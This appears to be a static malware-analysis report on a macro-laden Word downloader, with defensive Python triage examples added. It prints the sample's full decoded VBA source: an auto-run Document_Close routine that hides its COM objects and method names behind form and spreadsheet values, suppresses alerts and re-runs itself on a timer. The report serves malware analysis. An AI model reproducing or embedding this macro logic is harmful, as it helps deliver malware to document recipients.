Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e7d4d46ad0ea5cec…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 82.7 KB
Created: 2021-01-29 09:51:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: 92539d3043cc53ed9f14bfc5b48c537d
SHA-1: 471f4c9a328d7a774ebeb7759b3b142b14098fd6
SHA-256: e7d4d46ad0ea5cec86aeac8223f3d99dac7d309e01cd9107bdba73571c136c71
Risk score: 222

Heuristics (5)

  • ClamAV detection (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML (medium, 2 related findings) OOXML_VBA
    The document contains a VBA project (word/vbaProject.bin); macros are present.
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    Matched line in script:
    Set gh = CreateObject(UserForm1.g9 & UserForm1.ruc)
    The ProgID is not a string literal: it is concatenated at run time from two UserForm1 control values, so the COM class being instantiated cannot be read from the macro text.
  • CallByName call (high) OLE_VBA_CALLBYNAME
    Matched line in script:
    Set d9 = CallByName(gh.Workbooks, UserForm1.bu & UserForm1.co, 1, UserForm2.ComboBox1, , , , UserForm1.mp)
    The member name (second argument) is likewise assembled from UserForm1 control values, and the call type 1 is VbMethod, so this invokes a method on the Workbooks collection of the object created above, passing UserForm2.ComboBox1 as the first argument and UserForm1.mp as the fifth. The positional shape (a path, three skipped arguments, then a fifth) matches Workbooks.Open(FileName, UpdateLinks, ReadOnly, Format, Password), but the member name itself is not present in the macro text.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (all labelled "In document text (OOXML body / shared strings)"):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
    Every URL in this list is an XML namespace URI declared in the OOXML parts (the xmlns attributes of document.xml and related parts, including the markup-compatibility and relationships schemas). None is an external hyperlink relationship target, a macro string or a download location, so this finding contributes no network indicator for this sample.
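The twenty-eight URLs above are all namespace identifiers, and an analyst needs a way to separate that noise from URLs that can actually be pivoted on. The Python below is an added example, not part of this report or of the scanner that produced it: it opens an OOXML package and sorts every URL by origin (xmlns declarations and relationship Type URIs, external relationship targets such as hyperlinks or remote templates, and URLs typed into body text). The .docx it scans, and the hostnames inside it, are constructed for the example.

```python
"""Classify the URLs in an OOXML package by where they come from.

Added example, not part of the original report. Namespace and relationship
Type URIs appear in every Word file and are not destinations; external
relationship targets and URLs in body text are what an analyst pivots on.
The sample .docx is constructed in memory.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
XMLNS_RE = re.compile(r'xmlns(?::[\w.-]+)?="([^"]+)"')
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def classify_urls(package_bytes: bytes) -> dict:
    """Return URL sets keyed by source: namespace, rel_type, external, text."""
    found = {"namespace": set(), "rel_type": set(), "external": set(), "text": set()}
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith((".xml", ".rels")):
                continue  # binary parts (vbaProject.bin, media) are out of scope here
            data = zf.read(name)
            # xmlns declarations are identifiers, not network destinations.
            found["namespace"].update(XMLNS_RE.findall(data.decode("utf-8", "replace")))
            root = ET.fromstring(data)
            if name.endswith(".rels"):
                for rel in root.iter(REL_NS + "Relationship"):
                    found["rel_type"].add(rel.get("Type", ""))
                    if rel.get("TargetMode") == "External":  # hyperlink, remote template, ...
                        found["external"].add(rel.get("Target", ""))
                continue
            # Free-form URLs typed into the body live in text nodes (w:t);
            # hyperlinks are resolved through the .rels part handled above.
            for el in root.iter():
                if el.text:
                    found["text"].update(URL_RE.findall(el.text))
    return found


def actionable_urls(package_bytes: bytes) -> set:
    """URLs worth pivoting on: external targets and body text, minus schema URIs."""
    c = classify_urls(package_bytes)
    return (c["external"] | c["text"]) - c["namespace"] - c["rel_type"]


# Constructed minimal package: namespace noise, one external link, one body URL.
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" '
    'xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" '
    'xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" '
    'mc:Ignorable="wpc">'
    "<w:body><w:p><w:r><w:t>Invoice: see http://invoice.example.test/doc</w:t></w:r></w:p>"
    '<w:p><w:hyperlink r:id="rId1"><w:r><w:t>click</w:t></w:r></w:hyperlink></w:p>'
    "</w:body></w:document>"
)
DOCUMENT_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
    'Target="http://payload.example.test/get" TargetMode="External"/>'
    '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" '
    'Target="vbaProject.bin"/>'
    "</Relationships>"
)


def build_sample_docx() -> bytes:
    """Constructed sample; the hostnames are placeholders, not real indicators."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr("word/_rels/document.xml.rels", DOCUMENT_RELS)
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    pkg = build_sample_docx()
    for kind, urls in classify_urls(pkg).items():
        print(f"{kind:>10}: {sorted(urls)}")
    print("actionable:", sorted(actionable_urls(pkg)))
```

Run against this sample, the same logic would put all twenty-eight URLs above into the namespace bucket and leave the actionable set empty, which is the correct reading of the finding: the only strings that matter in this file are the ones the macro reassembles at run time, and those are not URLs in any XML part.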

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7028 bytes
SHA-256: 1ae044b4f63be6508144ebcbb4f1895e2b046cd4b203728461da37e3e5e237f6
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public ou, dh, g5, lg, wm, gh, gq, i, qa, bx, f41, ex, u4o, fi, lw, bku

Sub Document_Close()

f6

End Sub

Sub f6()

On Error Resume Next

e3 = UserForm2.ComboBox6

UserForm2.ComboBox1.ListIndex = 5

Set gh = CreateObject(UserForm1.g9 & UserForm1.ruc)

gh.DisplayAlerts = False

ni = UserForm2.ComboBox17

cd = 1301

ng = 0

Err.Number = 0

While cd <> 0 And ng < 32

Set d9 = CallByName(gh.Workbooks, UserForm1.bu & UserForm1.co, 1, UserForm2.ComboBox1, , , , UserForm1.mp)

cd = Err.Number

ng = ng + 16

Wend

mv = UserForm2.ComboBox12

If cd <> 0 Then

jv = UserForm2.ComboBox6

ErrHandler:

b4 = CallByName(Application, UserForm1.ib & UserForm1.qw, 2)

If b4 <> False Then

Set l4 = CreateObject(UserForm1.ly & UserForm1.j4)

CallByName l4.Documents, UserForm1.bu & UserForm1.co, 1, ActiveDocument.FullName, , True

CallByName l4, UserForm1.gf & UserForm1.mu, 1, Now + TimeSerial(0, 0, 2), UserForm1.Z & UserForm1.pl & "f6"

Else

CallByName Application, UserForm1.gf & UserForm1.mu, 1, Now + TimeSerial(0, 0, 17), UserForm1.Z & UserForm1.pl & "f6"

End If

gh.Quit

qj = UserForm2.ComboBox26

Exit Sub

End If

Dim e0

kp = UserForm2.ComboBox15

Set e0 = gh.sheets(1)

o0 = "'"

bku = gh.sheets(5).Cells(1, 1)

If Len(bku) < 1 Then

If gh.ActiveWorkbook.Title <> "Google" Then

ek = UserForm2.ComboBox21

GoTo ErrHandler

cp = UserForm2.ComboBox7

Else

Exit Sub

End If

du = UserForm2.ComboBox16

End If

bb = UserForm2.ComboBox28

c2 = gh.sheets(1).Cells(75, 12).Value

ydb = gh.sheets(1).Cells(59, 49).Value

jg = UserForm2.ComboBox27

bx = gh.sheets(1).Cells(6, 39).Value

f41 = gh.sheets(2).Cells(142, 2).Value

o88 = UserForm2.ComboBox22

wm = gh.sheets(2).Cells(113, 7).Value

kv = UserForm2.ComboBox3

ty = gh.sheets(2).Cells(77, 30).Value

zj4 = gh.sheets(1).Cells(36, 34).Value

ym = gh.sheets(3).Cells(116, 4).Value

t = gh.sheets(2).Cells(20, 28).Value

bo = gh.sheets(1).Cells(74, 20).Value

u4o = gh.sheets(2).Cells(73, 8).Value

gq = e0.Cells(74, 42).Value

qa = gh.sheets(3).Cells(22, 50).Value

by = gh.sheets(3).Cells(4, 18).Value

qy = UserForm2.ComboBox19

hqj = gh.sheets(2).Cells(44, 36).Value

pn = UserForm2.ComboBox25

ex = gh.sheets(1).Cells(42, 24).Value

f3 = gh.sheets(1).Cells(47, 39).Value

q0 = gh.sheets(2).Cells(92, 36).Value

ou = gh.sheets(3).Cells(53, 56).Value

jk = gh.sheets(3).Cells(42, 52).Value

fb = e0.Cells(146, 55).Value

i = gh.sheets(3).Cells(89, 46).Value

vvh = UserForm2.ComboBox23

dh = gh.sheets(3).Cells(12, 42).Value

c7 = gh.sheets(3).Cells(56, 26).Value

ouc = gh.sheets(2).Cells(54, 8).Value

lw = ""

Set Sh1 = gh.sheets(4)

n9 = 1

pj = True

While pj

ln = Sh1.Cells(n9, 1).Value

If Len(ln) < 1 Then

pj = False

Else

lw = lw & ln

End If

n9 = n9 + 1

Wend

je = CallByName(gh, bo, 2)

mk = UserForm2.ComboBox14

l5 = UserForm2.ComboBox11

UserForm1.jr.Value = zj4 & je & q0

UserForm1.ml.Value = ydb

CallByName CreateObject(ouc), fb, 1, UserForm1.jr, f3, UserForm1.ml

cb = UserForm2.ComboBox5

Set vc = CreateObject(c2)

Set cj = CallByName(vc, ty, 2)

nh = UserForm2.ComboBox27

Set ii = CallByName(cj, c7, 1)

Set qa = CallByName(vc, qa, 2)

Set lg = vc

UserForm5.ComboBox1 = "rm6"

Set ou = CallByName(fi, ou, 2)

i = CallByName(ou, i, 2)

UserForm1.x0.Value = jk & ym

UserForm3.ComboBox1 = t

UserForm1.x0.Value = by

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = i

vc = m0j

d9 = r9

e0 = se

cj = fo

ii = af

qa = df

t35 = UserForm2.ComboBox21

bx = u7

f41 = a2r

fi = ds1

ou = clb

lg = tmv

DoEvents

CallByName gh, hqj, 1

gh = rj

ig = UserForm2.ComboBox8

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C7D09B0D-E644-44C9-A5A6-54E87999975E}{068A5FF2-4071-4D07-B83C-3435B9350866}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E4618778-B0EC-4161-82D1-25AE151C492E}{EE1D96E6-2D05-41DC-9926-FDA44FDA6836}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 r7 = UserForm2.Controls.Count - 1
 
 
 
 

 p8 = ""
 For pr = 1 To r7 Step 2
 p8 = p8 & UserForm2.Controls.Item(pr)
 Next

i4 = UserForm2.ComboBox7


 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem p8
 ComboBox1.AddItem "gz"
 
 
 
 
 

be3 = UserForm2.ComboBox26

 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{F90A2AD4-541B-4F91-870F-4D87D1D6289F}{21E66F23-5F71-4B74-BB73-57314BAF6079}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ou, ActiveDocument.gq, VbMethod, 1, ActiveDocument.i
 CallByName ActiveDocument.ou, ActiveDocument.dh, VbMethod, UserForm1.x0.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{F8B7FAA4-A043-4445-925B-EA25AE924991}{400770B6-8120-4C1D-B1F2-DDF072666B8D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.lg, ActiveDocument.wm, VbMethod, UserForm1.x0.Value, ActiveDocument.lw, ActiveDocument.bku

zx = UserForm2.ComboBox22

End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{C3687108-C902-4132-A631-AFB4942E9413}{72CABBDE-4B8F-4365-902F-A4AA6984EFAF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.bx = CallByName(ActiveDocument.qa, ActiveDocument.bx, VbGet)
 Set ActiveDocument.f41 = CallByName(ActiveDocument.bx, ActiveDocument.f41, VbGet)
 Set ActiveDocument.fi = CallByName(ActiveDocument.f41, ActiveDocument.ex, VbMethod, ActiveDocument.u4o)
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 51200 bytes
SHA-256: 0926b9cea686fa523c025015fe066265c77a40ac1dc6545a9754408ddf02e126
Detection: ClamAV Doc.Downloader.Valyria-10033915-0
Obfuscation or payload (automated estimate): unlikely
Treat that estimate with caution; it reflects the absence of encoded string blobs, not the absence of obfuscation. The decoded source above is heavily indirected: the entry point is Document_Close, every CreateObject ProgID and CallByName member name is concatenated at run time from UserForm control values or read from worksheet cells of a workbook opened through the automation object gh, the remaining stage is assembled by concatenating column A of sheets(4) into lw, and the failure path passes a time (Now + TimeSerial(...)) and a procedure name ending in "f6" to a member resolved at run time, so the macro re-invokes itself on a timer. The UserForm3, UserForm4 and UserForm5 Initialize handlers, which fire on the first reference to each form from f6, carry the final CallByName chains. No ProgID, member name, URL or payload is recoverable from the VBA text alone; resolving them requires the stored UserForm control values (the form streams inside this vbaProject.bin) or dynamic execution.
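The obfuscation estimate above rests on string heuristics; what matters for triage is where each CreateObject ProgID and CallByName member name actually comes from. The Python below is an added example (not part of this report, of ClamAV or of oletools) that scans decoded VBA for auto-exec entry points, every CreateObject and CallByName site, and the origin of the name each one uses: a string literal, a UserForm control value (stored in the form's binary streams rather than in the source), a variable filled from a worksheet cell, or some other run-time value. UserForm_Initialize is treated as an entry point because the first reference to a form's predeclared instance (here `UserForm3.ComboBox1 = t` inside f6) loads the form and runs its Initialize handler. The sample input is an excerpt of the ThisDocument and UserForm3 modules shown above; the call-type mapping (1 = VbMethod, 2 = VbGet) is VBA's VbCallType enumeration.

```python
"""Static triage of indirected VBA: where do CreateObject ProgIDs and
CallByName member names come from?

Added example, not part of the original report or of oletools. The sample
input is an excerpt of the macro preview shown in the report.
"""
import re

ENTRY_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec|Workbook_Open|UserForm_Initialize)\b",
    re.I | re.M,
)
# Variables assigned from a worksheet cell: their values exist only at run time.
CELL_VAR_RE = re.compile(r"^\s*(\w+)\s*=\s*.*\.Cells\(", re.I | re.M)
CREATEOBJ_RE = re.compile(r"CreateObject\(([^()]*)\)", re.I)
# CallByName object, member-name expression, call type (statement or function form).
CALLBYNAME_RE = re.compile(r"CallByName\s*\(?\s*([^,]+?),\s*([^,]+?),\s*(\w+)", re.I)
CALLTYPE = {"1": "VbMethod", "2": "VbGet", "4": "VbLet", "8": "VbSet"}
INDICATORS = {
    "On Error Resume Next": "errors swallowed",
    "DisplayAlerts = False": "host UI prompts suppressed",
    "Now + TimeSerial(": "self re-entry on a timer",
}


def classify_source(expr: str, cell_vars: set) -> str:
    """Say where the string used as a ProgID or member name originates."""
    expr = expr.strip()
    if re.fullmatch(r'"[^"]*"', expr):
        return "literal"
    if re.search(r"\bUserForm\d+\.\w+", expr, re.I):
        return "userform-control"  # stored in the form's binary stream, not in source
    name = re.sub(r"^(ActiveDocument|ThisDocument)\.", "", expr, flags=re.I)
    if name in cell_vars:
        return "worksheet-cell"  # read from a workbook opened at run time
    return "runtime-variable"


def triage(vba: str) -> dict:
    """Entry points, dynamic call sites with name origins, and behaviour indicators."""
    cell_vars = set(CELL_VAR_RE.findall(vba))
    sites = []
    for m in CREATEOBJ_RE.finditer(vba):
        sites.append({"api": "CreateObject", "object": None, "name": m.group(1).strip(),
                      "source": classify_source(m.group(1), cell_vars), "calltype": None})
    for m in CALLBYNAME_RE.finditer(vba):
        sites.append({"api": "CallByName", "object": m.group(1).strip(), "name": m.group(2).strip(),
                      "source": classify_source(m.group(2), cell_vars),
                      "calltype": CALLTYPE.get(m.group(3), m.group(3))})
    lowered = vba.lower()
    return {
        "entry_points": ENTRY_RE.findall(vba),
        "call_sites": sites,
        "indicators": [v for k, v in INDICATORS.items() if k.lower() in lowered],
    }


def resolvable_statically(report: dict) -> bool:
    """True only if every dynamic ProgID/member name is a string literal."""
    return all(s["source"] == "literal" for s in report["call_sites"])


# Excerpt of the report's decoded macro (ThisDocument and UserForm3), used as sample input.
SAMPLE_VBA = r"""
Sub Document_Close()
f6
End Sub

Sub f6()
On Error Resume Next
Set gh = CreateObject(UserForm1.g9 & UserForm1.ruc)
gh.DisplayAlerts = False
Set d9 = CallByName(gh.Workbooks, UserForm1.bu & UserForm1.co, 1, UserForm2.ComboBox1, , , , UserForm1.mp)
CallByName Application, UserForm1.gf & UserForm1.mu, 1, Now + TimeSerial(0, 0, 17), UserForm1.Z & UserForm1.pl & "f6"
bo = gh.sheets(1).Cells(74, 20).Value
gq = e0.Cells(74, 42).Value
ouc = gh.sheets(2).Cells(54, 8).Value
fb = e0.Cells(146, 55).Value
je = CallByName(gh, bo, 2)
CallByName CreateObject(ouc), fb, 1, UserForm1.jr, f3, UserForm1.ml
UserForm3.ComboBox1 = t
End Sub

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.ou, ActiveDocument.gq, VbMethod, 1, ActiveDocument.i
End Sub
"""

if __name__ == "__main__":
    report = triage(SAMPLE_VBA)
    print("entry points:", report["entry_points"])
    for s in report["call_sites"]:
        print(f'  {s["api"]:<12} name={s["name"]!r:<42} source={s["source"]}')
    print("indicators:", report["indicators"])
    print("resolvable from source alone:", resolvable_statically(report))
```

On the excerpt, none of the seven dynamic call sites uses a literal name: the ProgIDs and member names come from UserForm controls or from cells of the workbook the macro opens. That is the property a triage pipeline should key on; a sample whose every CreateObject and CallByName argument is a literal can be read off statically, one like this cannot, whatever an obfuscation score says.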